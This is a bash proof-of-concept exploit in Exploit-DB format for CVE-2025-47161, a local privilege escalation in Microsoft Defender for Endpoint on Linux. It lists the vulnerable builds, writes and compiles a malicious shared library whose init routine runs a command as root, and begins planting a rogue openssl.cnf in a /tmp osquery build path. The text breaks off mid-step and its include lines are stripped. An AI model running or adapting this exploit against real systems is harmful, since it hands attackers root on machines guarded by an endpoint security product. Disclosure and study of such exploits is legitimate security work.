#!/bin/bash # Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege # Date: 2025-05-27 # Exploit Author: Rich Mirch # Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/ # Software Link: https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux # Versions: # Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0 # Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0 # Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0 # Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0 # Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0 # # Vendor Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161 # Blog: http://stratascale.com/vulnerability-alert-cve202547161 # Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS # CVE : CVE-2025-47161 # echo "MDE Version: $(mdatp version)" # stage cat >mde-exp.c< #include #include #include void woot(){ // for manual testing if(isatty(STDERR_FILENO)) { fprintf(stderr,"Woot!\n"); } system("ps -ef > /woot.txt"); sleep(3000000); } EOF # build exploit gcc -fPIC -o woot.o -Wall -c mde-exp.c gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/ cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf <